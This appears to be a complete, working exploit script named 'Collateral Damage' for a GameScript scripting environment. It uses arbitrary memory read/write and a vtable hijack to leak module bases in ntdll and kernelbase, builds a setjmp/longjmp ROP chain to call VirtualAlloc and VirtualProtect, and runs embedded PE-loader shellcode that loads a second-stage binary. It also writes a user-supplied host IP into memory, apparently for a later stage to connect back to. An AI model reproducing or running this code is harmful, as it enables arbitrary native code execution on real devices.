//
// Collateral Damage - @carrot_c4k3 & @landaire - exploits.forsale
//

// !!! PUT YOUR IP BELOW !!!
// EX: var host_ip = "192.168.1.89"
var host_ip = "[YOUR IP HERE]"

// PE loader shellcode
let pe_loader_code = [
0xE9, 0xAF, 0x0, 0x0, 0x0, 0x12, 0x0, 0x0, 0xB0, 0x13, 0x0, 0x0, 0xD2, 0x12, 0x0, 0x0, 0xB0, 0x13, 0x0, 0x0, 0xC8, 0x13, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x25, 0x4C, 0x4F, 0x43, 0x41, 0x4C, 0x41, 0x50, 0x50, 0x44, 0x41, 0x54, 0x41, 0x25, 0x5C, 0x2E, 0x2E, 0x5C, 0x4C, 0x6F, 0x63, 0x61, 0x6C, 0x53, 0x74, 0x61, 0x74, 0x65, 0x5C, 0x73, 0x74, 0x61, 0x67, 0x65, 0x32, 0x2E, 0x62, 0x69, 0x6E, 0x0, 0x45, 0x78, 0x70, 0x61, 0x6E, 0x64, 0x45, 0x6E, 0x76, 0x69, 0x72, 0x6F, 0x6E, 0x6D, 0x65, 0x6E, 0x74, 0x53, 0x74, 0x72, 0x69, 0x6E, 0x67, 0x73, 0x41, 0x0, 0x47, 0x65, 0x74, 0x46, 0x69, 0x6C, 0x65, 0x53, 0x69, 0x7A, 0x65, 0x0, 0x43, 0x72, 0x65, 0x61, 0x74, 0x65, 0x46, 0x69, 0x6C, 0x65, 0x41, 0x0, 0x52, 0x65, 0x61, 0x64, 0x46, 0x69, 0x6C, 0x65, 0x0, 0x56, 0x69, 0x72, 0x74, 0x75, 0x61, 0x6C, 0x41, 0x6C, 0x6C, 0x6F, 0x63, 0x0, 0x56, 0x69, 0x72, 0x74, 0x75, 0x61, 0x6C, 0x50, 0x72, 0x6F, 0x74, 0x65, 0x63, 0x74, 0x0, 0x0, 0x18, 0x0, 0x0, 0x0, 0x0, 0x80, 0x0, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x41, 0x57, 0x41, 0x56, 0x41, 0x55, 0x41, 0x54, 0x56, 0x57, 0x55, 0x53, 0x48, 0x81, 0xEC, 0x8, 0x1, 0x0, 0x0, 0x48, 0x83, 0xE4, 0xF0, 0x48, 0xB8, 0x4B, 0x0, 0x45, 0x0, 0x52, 0x0, 0x4E, 0x0, 0x48, 0x89, 0x44, 0x24, 0x40, 0x48, 0xB8, 0x45, 0x0, 0x4C, 0x0, 0x42, 0x0, 0x41, 0x0, 0x48, 0x89, 0x44, 0x24, 0x48, 0x48, 0xB8, 0x53, 0x0, 0x45, 0x0, 0x2E, 0x0, 0x44, 0x0, 0x48, 0x89, 0x44, 0x24, 0x50, 0xC7, 0x44, 0x24, 0x58, 0x4C, 0x0, 0x4C, 0x0, 0x66, 0x83, 0x64, 0x24, 0x5C, 0x0, 0x65, 0x48, 0x8B, 0x4, 0x25, 0x60, 0x0, 0x0, 0x0, 0x48, 0x8B, 0x40, 0x18, 0x48, 0x83, 0xC0, 0x10, 0x48, 0x89, 0xC1, 0x48, 0x8B, 0x51, 0x60, 0x48, 0x85, 0xD2, 0x74, 0x57, 0x49, 0xC7, 0xC1, 0xFF, 0xFF, 0xFF, 0xFF, 0x45, 0x31, 0xD2, 0x4D, 0x89, 0xD0, 0x66, 0x42, 0x83, 0x7C, 0x4A, 0x2, 0x0, 0x4D, 0x8D, 0x49, 0x1, 0x4D, 0x8D, 0x52, 0x1, 0x75, 0xEC, 0x49, 0xC7, 0xC2, 0xFF, 0xFF, 0xFF, 0xFF, 0x66, 0x42, 0x83, 0x7C, 0x54, 0x42, 0x0, 0x4D, 0x8D, 0x52, 0x1, 0x75, 0xF3, 0x4D, 0x39, 0xCA, 0x75, 0x20, 0x45, 0x31, 0xC9, 0x49, 0x83, 0xE8, 0x1, 0x72, 0x29, 0x46, 0xF, 0xB7, 0x14, 0xA, 0x66, 0x46, 0x33, 0x54, 0xC, 0x40, 0x49, 0x83, 0xC1, 0x2, 0x66, 0x41, 0xF7, 0xC2, 0xDF, 0xFF, 0x74, 0xE3, 0x48, 0x8B, 0x9, 0x48, 0x39, 0xC1, 0x75, 0x98, 0xB8, 0x4, 0x4, 0x0, 0x0, 0xE9, 0x32, 0x1, 0x0, 0x0, 0x4C, 0x8B, 0x61, 0x30, 0x48, 0x8D, 0x15, 0xDF, 0xFE, 0xFF, 0xFF, 0x4C, 0x89, 0xE1, 0xE8, 0x33, 0x1, 0x0, 0x0, 0x48, 0x89, 0xC6, 0x48, 0x8D, 0x15, 0xC1, 0xFE, 0xFF, 0xFF, 0x4C, 0x89, 0xE1, 0xE8, 0x21, 0x1, 0x0, 0x0, 0x49, 0x89, 0xC6, 0x48, 0x8D, 0x15, 0xC4, 0xFE, 0xFF, 0xFF, 0x4C, 0x89, 0xE1, 0xE8, 0xF, 0x1, 0x0, 0x0, 0x48, 0x89, 0xC3, 0x48, 0x8D, 0x15, 0xBF, 0xFE, 0xFF, 0xFF, 0x4C, 0x89, 0xE1, 0xE8, 0xFD, 0x0, 0x0, 0x0, 0x48, 0x89, 0xC7, 0x48, 0x8D, 0x15, 0x7F, 0xFE, 0xFF, 0xFF, 0x4C, 0x89, 0xE1, 0xE8, 0xEB, 0x0, 0x0, 0x0, 0x49, 0x89, 0xC7, 0x48, 0x8D, 0x15, 0x53, 0xFE, 0xFF, 0xFF, 0x4C, 0x89, 0xE1, 0xE8, 0xD9, 0x0, 0x0, 0x0, 0x48, 0x8D, 0xD, 0x1C, 0xFE, 0xFF, 0xFF, 0x4C, 0x8D, 0x64, 0x24, 0x40, 0x4C, 0x89, 0xE2, 0x41, 0xB8, 0xC8, 0x0, 0x0, 0x0, 0xFF, 0xD0, 0x48, 0x83, 0x64, 0x24, 0x30, 0x0, 0xC7, 0x44, 0x24, 0x28, 0x80, 0x0, 0x0, 0x0, 0xC7, 0x44, 0x24, 0x20, 0x4, 0x0, 0x0, 0x0, 0x4C, 0x89, 0xE1, 0xBA, 0x0, 0x0, 0x0, 0x80, 0x45, 0x31, 0xC0, 0x45, 0x31, 0xC9, 0x41, 0xFF, 0xD6, 0x48, 0x83, 0xF8, 0xFF, 0x74, 0x5A, 0x49, 0x89, 0xC6, 0x48, 0x89, 0xC1, 0x31, 0xD2, 0x41, 0xFF, 0xD7, 0x89, 0xC5, 0x41, 0x89, 0xC7, 0x31, 0xC9, 0x4C, 0x89, 0xFA, 0x41, 0xB8, 0x0, 0x30, 0x0, 0x0, 0x41, 0xB9, 0x4, 0x0, 0x0, 0x0, 0xFF, 0xD3, 0x48, 0x89, 0xC3, 0x4C, 0x8D, 0x64, 0x24, 0x3C, 0x49, 0x89, 0xC5, 0x85, 0xED, 0x74, 0x2F, 0x83, 0x64, 0x24, 0x3C, 0x0, 0x48, 0x83, 0x64, 0x24, 0x20, 0x0, 0x4C, 0x89, 0xF1, 0x4C, 0x89, 0xEA, 0x41, 0x89, 0xE8, 0x4D, 0x89, 0xE1, 0xFF, 0xD6, 0x85, 0xC0, 0x74, 0x2D, 0x8B, 0x44, 0x24, 0x3C, 0x49, 0x1, 0xC5, 0x29, 0xC5, 0xEB, 0xD4, 0xB8, 0x1, 0x0, 0x0, 0x0, 0xEB, 0x20, 0x4C, 0x8D, 0x4C, 0x24, 0x3C, 0x41, 0x83, 0x21, 0x0, 0x48, 0x89, 0xD9, 0x4C, 0x89, 0xFA, 0x41, 0xB8, 0x20, 0x0, 0x0, 0x0, 0xFF, 0xD7, 0xFF, 0xD3, 0xEB, 0x5, 0xB8, 0x2, 0x0, 0x0, 0x0, 0x48, 0x81, 0xC4, 0x8, 0x1, 0x0, 0x0, 0x5B, 0x5D, 0x5F, 0x5E, 0x41, 0x5C, 0x41, 0x5D, 0x41, 0x5E, 0x41, 0x5F, 0xC3, 0x41, 0x57, 0x41, 0x56, 0x41, 0x55, 0x41, 0x54, 0x56, 0x57, 0x55, 0x53, 0x66, 0x81, 0x39, 0x4D, 0x5A, 0xF, 0x85, 0x9F, 0x0, 0x0, 0x0, 0x8B, 0x41, 0x3C, 0x8B, 0x84, 0x1, 0x88, 0x0, 0x0, 0x0, 0x44, 0x8B, 0x4C, 0x1, 0x18, 0x44, 0x8B, 0x44, 0x1, 0x1C, 0x44, 0x8B, 0x5C, 0x1, 0x20, 0x44, 0x8B, 0x54, 0x1, 0x24, 0x31, 0xC0, 0x45, 0x31, 0xE4, 0x4D, 0x39, 0xCC, 0xF, 0x84, 0x8E, 0x0, 0x0, 0x0, 0x49, 0x8D, 0x7C, 0x24, 0x1, 0x44, 0x89, 0xE6, 0x41, 0x8D, 0x1C, 0xB3, 0x8B, 0x1C, 0x19, 0x80, 0x3C, 0x19, 0x0, 0x49, 0x89, 0xFC, 0x74, 0xDF, 0x48, 0x1, 0xCB, 0x49, 0xC7, 0xC7, 0xFF, 0xFF, 0xFF, 0xFF, 0x45, 0x31, 0xE4, 0x4D, 0x89, 0xE6, 0x42, 0x80, 0x7C, 0x3B, 0x1, 0x0, 0x4D, 0x8D, 0x7F, 0x1, 0x4D, 0x8D, 0x64, 0x24, 0x1, 0x75, 0xEC, 0x49, 0xC7, 0xC5, 0xFF, 0xFF, 0xFF, 0xFF, 0x42, 0x80, 0x7C, 0x2A, 0x1, 0x0, 0x4D, 0x8D, 0x6D, 0x1, 0x75, 0xF4, 0x49, 0x89, 0xFC, 0x4D, 0x39, 0xFD, 0x75, 0xA3, 0x45, 0x31, 0xFF, 0x49, 0x83, 0xEE, 0x1, 0x72, 0x1A, 0x42, 0x8A, 0x2C, 0x3A, 0x4D, 0x8D, 0x67, 0x1, 0x42, 0x3A, 0x2C, 0x3B, 0x4D, 0x89, 0xE7, 0x74, 0xE9, 0x49, 0x89, 0xFC, 0xEB, 0x84, 0x31, 0xC0, 0xEB, 0x17, 0x41, 0x8D, 0x4, 0x72, 0xF, 0xB7, 0x4, 0x1, 0x25, 0xFF, 0x3F, 0x0, 0x0, 0x41, 0x8D, 0x4, 0x80, 0x8B, 0x4, 0x1, 0x48, 0x1, 0xC8, 0x5B, 0x5D, 0x5F, 0x5E, 0x41, 0x5C, 0x41, 0x5D, 0x41, 0x5E, 0x41, 0x5F, 0xC3, 0x1, 0x13, 0xA, 0x0, 0x13, 0x1, 0x21, 0x0, 0xC, 0x30, 0xB, 0x50, 0xA, 0x70, 0x9, 0x60, 0x8, 0xC0, 0x6, 0xD0, 0x4, 0xE0, 0x2, 0xF0, 0x1, 0xC, 0x8, 0x0, 0xC, 0x30, 0xB, 0x50, 0xA, 0x70, 0x9, 0x60, 0x8, 0xC0, 0x6, 0xD0, 0x4, 0xE0, 0x2, 0xF0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0
]


// hex printing helper functions
let i2c_map = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D', 'E', 'F']
let c2i_map = {'0': 0, '1': 1, '2': 2, '3': 3, '4': 4, '5': 5, '6': 6, '7': 7, '8': 8, '9': 9, 'A': 0xA, 'B': 0xB, 'C': 0xC, 'D': 0xD, 'E': 0xE, 'F': 0xF}

fn hex_to_num(s) {
	var str_len = len(s)
	var res = 0
	for (var i = 0; i < str_len; i++)
	{
		res = res << 4
		res = res + c2i_map[s[i]]
	}
	return res
}

fn num_to_hex(num, byte_count) {
	if (byte_count > 8) {
		byte_count = 8
	}
	var res = ""
	for (var i = 0; i < byte_count * 2; i++) {
		var idx = (num >> (4 * i)) & 15
		res = i2c_map[idx] + res 
	}
	return res
}

fn num_to_hex8(num) {
	return num_to_hex(num, 1)
}

fn num_to_hex16(num) {
	return num_to_hex(num, 2)
}

fn num_to_hex32(num) {
	return num_to_hex(num, 4)
}

fn num_to_hex64(num) {
	return num_to_hex(num, 8)
}

fn hex_dump(addr, count) {
	for (var i = 0; i < count; i++) {
		if (i > 0 && (i % 16) == 0) {
			printConsole("\n")
		}
		var cur_byte = pointerGetUnsignedInteger8Bit(0, addr + i)
		printConsole(num_to_hex8(cur_byte) + " ")
	}
}

fn array_fill(arr) {
	var arr_len = len(arr)
	for (var i = 0; i < arr_len; i++) {
		arr[i] = 0x41
	}
}

fn round_down(val, bound) {
	return floor(val - (val % bound))
}

fn array_compare(a1, a2) {
	if (len(a1) != len(a2)) {
		return false
	}
	var arr_len = len(a1)
	
	for (var i = 0; i < arr_len; i++) {
		if (a1[i] != a2[i]) {
			return false
		}
	}

	return true
}

// shorthand helpers for memory access
fn write8(addr, val) {
	pointerSetUnsignedInteger8Bit(0, addr, val)
}

fn read8(addr) {
	return pointerGetUnsignedInteger8Bit(0, addr)
}

fn write16(addr, val) {
	pointerSetAtOffsetUnsignedInteger16Bit(0, addr, val)
}

fn read16(addr) {
	return pointerGetAtOffsetUnsignedInteger16Bit(0, addr)
}

fn write32(addr, val) {
	pointerSetAtOffsetUnsignedInteger(0, addr, val)
}

fn read32(addr) {
	return pointerGetAtOffsetUnsignedInteger(0, addr)
}


fn write64(addr, val) {
	pointerSetAtOffsetUnsignedInteger64Bit(0, addr, val)
}

fn read64(addr) {
	return pointerGetAtOffsetUnsignedInteger64Bit(0, addr)
}

// helper to read a 64-bit val and automatically make it a hex str
fn read64_hex(addr) {
	var val_low = read32(addr)
	var val_high = read32(addr+4)
	return num_to_hex32(val_high) + num_to_hex32(val_low)
}

fn read_buf(addr, buf) {
	var buf_len = len(buf)
	for (var i = 0; i < buf_len; i++) {
		buf[i] = read8(addr + i)
	}
}

fn write_buf(addr, buf) {
	var buf_len = len(buf)
	for (var i = 0; i < buf_len; i++) {
		write8(addr+i, buf[i])
	}
}

fn find_bytes(addr, max_len, pattern, buf) {
	for (var i = 0; i < max_len; i++) {
		read_buf(addr + i, buf)
		if (array_compare(pattern, buf)) {
			return addr + i
		}
	}
	return 0
}

fn find64(addr, max_len, v) {
	var offset = 0
	while (1) {
		var temp_val = read64(addr+offset)
		if (temp_val == v) {
			return addr+offset
		}
		offset += 8
	}
	return 0
}

// shorthand funcs
fn ptr_to_num(p) {
	return numberFromRaw64BitUnsignedInteger(p)
}

fn make_cstr(s) {
	var str_len = len(s) + 1
	var s_ptr = globalArrayNew8Bit(s, str_len)
	pointerSetString(s_ptr, 0, s)
	return ptr_to_num(s_ptr)
}

var gs_base = 0
var ntdll_base = 0
var kernelbase_base = 0
var longjmp_ptr = 0
var setjmp_ptr = 0
var gadget_ptr = 0
var gadget_rsp0x48_ptr = 0
var gadget_pushrax_ptr = 0
fn call_native(func_ptr, rcx, rdx, r8, r9) {
	// set this gadget here
	gadget_rsp0x48_ptr = gs_base + 0xE04B
	gadget_pushrax_ptr = gs_base + 0x1F13A
	var call_done = false

	// allocate 0x120 (space for vtable + setjmp data)
	var obj_ptr = globalArrayNew8Bit("call", 0x100)
	var objp = ptr_to_num(obj_ptr)
	var vt_ptr = globalArrayNew8Bit("vtable", 0x18)
	var vtp = ptr_to_num(vt_ptr)
	var stack_size = 0x4000
	var stack_ptr = globalArrayNew8Bit("stack", stack_size)
	var stackp = ptr_to_num(stack_ptr)
	var jmpctx_ptr = globalArrayNew8Bit("jctx", 0x100)
	var jcp = ptr_to_num(jmpctx_ptr)

	// set up vtable pointers
	write64(vtp+8, setjmp_ptr)
	write64(objp, vtp)

	// trigger vtable call
	slBus_destroy(obj_ptr)

	memcpy(jmpctx_ptr, 0, obj_ptr, 0, 0x100)

	// set up our rop chain
	var r10 = 0
	var r11 = 0
	write64(stackp+stack_size-0xA0, rdx)
	write64(stackp+stack_size-0x98, rcx)
	write64(stackp+stack_size-0x90, r8)
	write64(stackp+stack_size-0x88, r9)
	write64(stackp+stack_size-0x80, r10)
	write64(stackp+stack_size-0x78, r11)
	write64(stackp+stack_size-0x70, func_ptr)
	write64(stackp+stack_size-0x68, gadget_pushrax_ptr)
	// 0x30 bytes of padding
	write64(stackp+stack_size-0x38, 0x15151515)
	write64(stackp+stack_size-0x30, gs_base+0x109C4A)
	write64(stackp+stack_size-0x28, jcp)
	write64(stackp+stack_size-0x20, longjmp_ptr);
	
	// set up the context to do the longjmp
	write64(vtp+8, longjmp_ptr)
	write64(objp, vtp)
	// rsp
	write64(objp+0x10, stackp+stack_size-0xA0)
	// rip
	write64(objp+0x50, gadget_ptr)
	
	// trigger vtable call
	slBus_destroy(obj_ptr)
	var ret_val = read64(stackp+stack_size-0x68)

	// clean up our objects
	globalArrayDelete("call")
	globalArrayDelete("vtable")
	globalArrayDelete("stack")
	globalArrayDelete("jctx")

	return ret_val
}

fn find_module_base(addr) {
	var search_addr = round_down(addr, 0x10000)	

	while (1) {
		var magic_static = [0x4D, 0x5A]
		var magic_read = [0, 0]
		read_buf(search_addr, magic_read)

		if (array_compare(magic_static, magic_read)) {
			return search_addr
		}
		search_addr -= 0x10000
	}
	return 0
}

fn get_dll_exports(base_addr) {
	var res = {}
	var magic_static = [0x4D, 0x5A]
	var magic_read = [0, 0]
	read_buf(base_addr, magic_read)

	if (!array_compare(magic_static, magic_read)) {
		printConsole("Magic is invalid!\n")
		return res
	}

	
	var e_lfanew = read32(base_addr+0x3c)
	var exports_addr = base_addr + read32(base_addr+e_lfanew+0x70+0x18)

	var num_funcs = read32(exports_addr+0x14)
	var num_names = read32(exports_addr+0x18)

	var funcs_addr = base_addr + read32(exports_addr+0x1c)
	var names_addr = base_addr + read32(exports_addr+0x20)
	var ords_addr = base_addr + read32(exports_addr+0x24)

	for (var i = 0; i < num_names; i++) {
		var name_addr = base_addr + read32(names_addr + (4 * i))
		var name_str = pointerGetSubstring(0, name_addr, 0x20)
		var ordinal = read16(ords_addr + (2 * i))
		var func_addr =  base_addr + read32(funcs_addr + (4 * ordinal))
		res[name_str] = func_addr
		//printConsole("Export: " + name_str + " - " + num_to_hex64(func_addr) + "\n")
	}

	return res
}

var VirtualAlloc_ptr = 0
var VirtualProtect_ptr = 0
fn map_code(code) {
	var code_addr = call_native(VirtualAlloc_ptr, 0, 0x100000, 0x3000, 4)
	write_buf(code_addr, code)

	var oldp_ptr = globalArrayNew8Bit("oldp", 0x100)
	var oldpp = ptr_to_num(oldp_ptr)
	call_native(VirtualProtect_ptr, code_addr, 0x100000, 0x20, oldpp)
	return code_addr
}

fn map_page(addr) {
	var code_addr = call_native(VirtualAlloc_ptr, addr, 0x100000, 0x3000, 4)
	return code_addr
}


// create and dump our object to the terminal
var slbus_ptr = slBus_create()
var slp = numberFromRaw64BitUnsignedInteger(slbus_ptr)

// get the base of the GameScript module via the vtable
gs_base = read64(slp) - 0x16faf8

ntdll_base = find_module_base(read64(gs_base + 0x125398))
kernelbase_base = find_module_base(read64(gs_base + 0x1253A0))

var setjmp_bytes = [0x48,0x89,0x11,0x48,0x89,0x59,0x08,0x48,0x89,0x69,0x18,0x48,0x89,0x71,0x20,0x48]
var longjmp_bytes = [0x48,0x8B,0xC2,0x48,0x8B,0x59,0x08,0x48,0x8B,0x71,0x20,0x48,0x8B,0x79,0x28,0x4C]
var tmp_bytes = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]

setjmp_ptr = find_bytes(ntdll_base, 0x217000, setjmp_bytes, tmp_bytes)
longjmp_ptr = find_bytes(ntdll_base, 0x217000, longjmp_bytes, tmp_bytes)

// bytes for the following gadget: pop rdx;pop rcx;pop r8;pop r9;pop r10;pop r11; ret
var gadget_bytes = [0x5A, 0x59, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5A, 0x41, 0x5B, 0xC3]
tmp_bytes = [0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00]
gadget_ptr = find_bytes(ntdll_base, 0x217000, gadget_bytes, tmp_bytes)


// get the ntdll & kernel base exports and find VirtualAlloc/Protect
var kernelbase_exports = get_dll_exports(kernelbase_base)
var ntdll_exports = get_dll_exports(ntdll_base)
VirtualAlloc_ptr = kernelbase_exports["VirtualAlloc"]
VirtualProtect_ptr = kernelbase_exports["VirtualProtect"]
var VirtualFree_ptr = kernelbase_exports["VirtualFree"]


// allocate our token info buffer
var tinfo_ptr = globalArrayNew8Bit("tinfo", 0x2000)
var tinfop = ptr_to_num(tinfo_ptr)

// write the ip to the global page
var global_page = map_page(0x44000000)
pointerSetString(0, global_page, host_ip)

// map the pe loader
var pe_loader_ptr = map_code(pe_loader_code)
var pe_ret = call_native(pe_loader_ptr, 0, 0, 0, 0)
